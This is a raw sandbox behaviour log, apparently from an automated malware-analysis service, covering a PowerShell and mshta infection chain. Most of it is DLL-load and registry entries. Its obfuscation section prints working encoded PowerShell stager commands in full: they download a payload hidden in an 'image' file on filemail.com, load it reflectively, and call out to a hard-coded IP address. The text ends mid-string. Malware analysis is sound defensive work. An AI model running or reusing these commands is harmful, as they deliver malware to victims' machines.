                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: vssapi.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: vsstrace.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: ieframe.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: netapi32.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: wkscli.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: mlang.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: winsqlite3.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: wintypes.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\cleanmgr.exeSection loaded: cryptbase.dll
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeSection loaded: wininet.dll
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeSection loaded: mswsock.dll
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeSection loaded: dnsapi.dll
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeSection loaded: iphlpapi.dll
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeSection loaded: fwpuclnt.dll
                    Source: C:\Program Files (x86)\uhXVydjeEbSCoHZeOBkPYzxewZEyisEFGekWjjbKpmYIRxkDrAIGKBGrfEDxuUeCCeLAcrANKnVhFt\TjxlUxenxgDChq.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cleanmgr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1360997024.000000000710E000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1789795161.0000000007010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1791049317.000000000748A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TjxlUxenxgDChq.exe, 0000000E.00000000.1750598872.0000000000FCE000.00000002.00000001.01000000.0000000C.sdmp, TjxlUxenxgDChq.exe, 00000012.00000000.1900556011.0000000000FCE000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb( source: powershell.exe, 00000003.00000002.1360879801.00000000070EE000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000003.1829565622.0000000004BCA000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000003.1831959392.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000D.00000002.1836258837.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, cleanmgr.exe, cleanmgr.exe, 0000000F.00000003.1829565622.0000000004BCA000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2579148300.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000003.1831959392.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2579148300.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: cleanmgr.pdb source: TjxlUxenxgDChq.exe, 0000000E.00000003.1769889209.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, TjxlUxenxgDChq.exe, 0000000E.00000003.1769889209.0000000000B84000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: aspnet_compiler.pdb source: cleanmgr.exe, 0000000F.00000002.2579593004.000000000555C000.00000004.10000000.00040000.00000000.sdmp, cleanmgr.exe, 0000000F.00000002.2567427488.000000000322B000.00000004.00000020.00020000.00000000.sdmp, TjxlUxenxgDChq.exe, 00000012.00000002.2579590373.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2132405296.0000000020D4C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1789795161.0000000007010000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1791049317.000000000748A000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: cleanmgr.pdbGCTL source: TjxlUxenxgDChq.exe, 0000000E.00000003.1769889209.0000000000BA2000.00000004.00000020.00020000.00000000.sdmp, TjxlUxenxgDChq.exe, 0000000E.00000003.1769889209.0000000000B84000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: q6C:\Users\user\AppData\Local\Temp\uzumsuzj\uzumsuzj.pdb source: powershell.exe, 00000001.00000002.1466721064.0000000005437000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 0000000A.00000002.1789795161.0000000007010000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000A.00000002.1791049317.000000000748A000.00000004.00000800.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCgnT0pQaW1hZ2VVcmwgPSBHZEhodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxlaycrJ2V5PXNoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNCcrJ3RueGxBJysnVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGMnKyc5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBHJysnZEg7T0pQd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0JysnLldlYkNsaWVudDtPSicrJ1BpbWEnKydnZUJ5dGVzID0gT0pQd2ViQ2xpZW50LkRvd25sb2FkRGF0YShPSlBpbWFnZVVybCk7T0pQaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuYycrJ29kaW4nKydnXTo6VVRGOC5HZXRTdHJpbmcoT0pQaW1hZ2VCeXRlcyk7T0pQc3RhcnRGbGFnID0gR2RIPDxCQVNFNjRfU1RBUlQ+PkdkSDtPJysnSlBlbmRGbGFnID0gR2RIPDxCQVNFNjRfRU5EPj5HZEg7T0pQc3RhcnRJbmRleCA9IE9KUGltYWdlVGV4dC5JbicrJ2RleE9mKE9KUHN0YXJ0RmxhZyk7T0pQZW5kSW5kZXggPSBPSlBpbWFnZVRleHQuSW4nKydkZXhPZihPSlBlbmRGbGFnKTtPSlBzdGFydEluZGV4IC1nZSAwIC1hbmQgT0pQZW5kSW5kZXggLWd0JysnIE9KUHN0YXJ0SW5kZXg7T0pQc3RhcnRJbmRleCArPSBPSlBzdGFydEZsYWcuTGVuZ3RoO09KUGJhc2U2NExlbmd0aCA9IE9KUGVuZEluZGV4IC0gT0pQcycrJ3RhcnRJbmRleDtPSlBiYXNlNjRDb21tYW5kID0gJysnT0pQaW1hZ2VUZXh0LlN1YnN0cmluZyhPSlBzdGFydEluZGV4LCBPSlBiYXNlNjRMZW5ndGgpJysnO09KUGJhc2U2NFJldmVyc2VkID0gLWpvJysnaW4gKE9KUGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSByZVIgRm9yRWFjaC1PYmplY3QgeyBPSlBfIH0pWy0xLi4tKE9KUGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07T0pQY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhPSlBiYXNlNjRSZXZlcnNlZCk7T0pQbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKE9KUGNvbW0nKydhbmRCeXRlcyk7T0pQdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHZEhWJysnQUlHZEgpO09KUHZhaU1lJysndGhvZC5JbnZva2UoT0pQbnVsbCwgQChHZEh0eHQuQU1NUkMvMDUxMS80NTIuNTUnKycxLjA3LjY0MS8vOnB0dGhHJysnZEgsICcrJ0dkSGRlc2F0aScrJ3ZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGRlc2F0aXZhZG9HZEgsIEdkSGFzcG5ldF9jb21waWxlckdkSCwgR2RIZGVzYXRpdmFkb0dkSCwgR2RIZGVzYXRpdmFkb0dkSCxHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIZGVzYXRpJysndmFkb0dkSCwnKydHZEhkZXNhdGl2YWRvR2RILEdkSGRlc2F0aXZhZG9HZEgsR2RIMUdkSCxHZEhkZXNhdGl2YWRvR2RIKSk7JyktY1JlcGxhQ2UgIChbQ0hhUl03MStbQ0hhUl0xMDArW0NIYVJdNzIpLFtDSGFSXTM5LWNSZXBsYUNlIChbQ0hhUl0xMTQrW0NIYVJdMTAxK1tDSGFSXTgyKSxbQ0hhUl0xMjQgLWNSZXBsYUNlIChbQ0hhUl03OStbQ0hhUl03NCtbQ0hhUl04MCksW0NIYVJdMzYpfC4gKCAkc2hlbGxpRFsxXSskU0hFTGxpZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('OJPimageUrl = GdHhttps://3105.filemail.com/api/file/get?filek'+'ey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4'+'tnxlA'+'VbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c'+'9bfb9571732531309b5ff7c G'+'dH;OJPwebClient = New-Object System.Net'+'.WebClient;OJ'+'Pima'+'geBytes = OJPwebClient.DownloadData(OJPimageUrl);OJPimageText = [System.Text.Enc'+'odin'+'g]::UTF8.GetString(OJPimageBytes);OJPstartFlag = GdH<<BASE64_START>>GdH;O'+'JPendFlag = GdH<<BASE64_END>>GdH;OJPstartIndex = OJPimageText.In'+'dexOf(OJPstartFlag);OJPendIndex = OJPimageText.In'+'dexOf(OJPendFlag);OJPstartIndex -ge 0 -and OJPendIndex -gt'+' OJPstartIndex;OJPstartIndex += OJPstartFlag.Length;OJPbase64Length = OJPendIndex - OJPs'+'tartIndex;OJPbase64Command = '+'OJPimageText.Substring(OJPstartIndex, OJPbase64Length)'+';OJPbase64Reversed = -jo'+'in (OJPbase64Command.ToCharArray() reR ForEach-Object { OJP_ })[-1..-(OJPbase64Command.Length)];OJPcommandBytes = [System.Convert]::FromBase64String(OJPbase64Reversed);OJPloadedAssembly = [System.Reflection.Assembly]::Load(OJPcomm'+'andBytes);OJPvaiMethod = [dnlib.IO.Home].GetMethod(GdHV'+'AIGdH);OJPvaiMe'+'thod.Invoke(OJPnull, @(GdHtxt.AMMRC/0511/452.55'+'1.07.641//:ptthG'+'dH, '+'GdHdesati'+'vadoGdH, GdHdesativadoGdH, GdHdesativadoGdH, GdHaspnet_compilerGdH, GdHdesativadoGdH, GdHdesativadoGdH,GdHdesativadoGdH,GdHdesativadoGdH,GdHdesati'+'vadoGdH,'+'GdHdesativadoGdH,GdHdesativadoGdH,GdH1GdH,GdHdesativadoGdH));')-cReplaCe ([CHaR]71+[CHaR]100+[CHaR]72),[CHaR]39-cReplaCe ([CHaR]114+[CHaR]101+[CHaR]82),[CHaR]124 -cReplaCe ([CHaR]79+[CHaR]74+[CHaR]80),[CHaR]36)|. ( $shelliD[1]+$SHELlid[13]+'x')"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYsTem32\windOwsPoWeRshELl\v1.0\PowershELl.ExE" "PoWerSheLL.eXE -EX BypasS -noP -w 1 -C DEviceCrEDENTIALDEPLoYMEnt.EXe ; ieX($(iEX('[sySteM.TEXT.EnCOdIng]'+[CHAR]58+[chAR]0X3a+'UTF8.GetsTriNg([sysTem.ConVert]'+[CHaR]0X3A+[CHAr]0x3A+'fRombasE64sTRiNG('+[ChAR]0X22+'JGVZYlFRYlRxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRFZklOaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRLYk1uT2lGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5ZkVqSG9vTHUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGeXNTUVRxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZ04pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImduS3dXQyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvWlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZVliUVFiVHE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNDYuNzAuMTU1LjI1NC8xMTUwL2NyZWF0ZWFiZXR0ZXJidXR0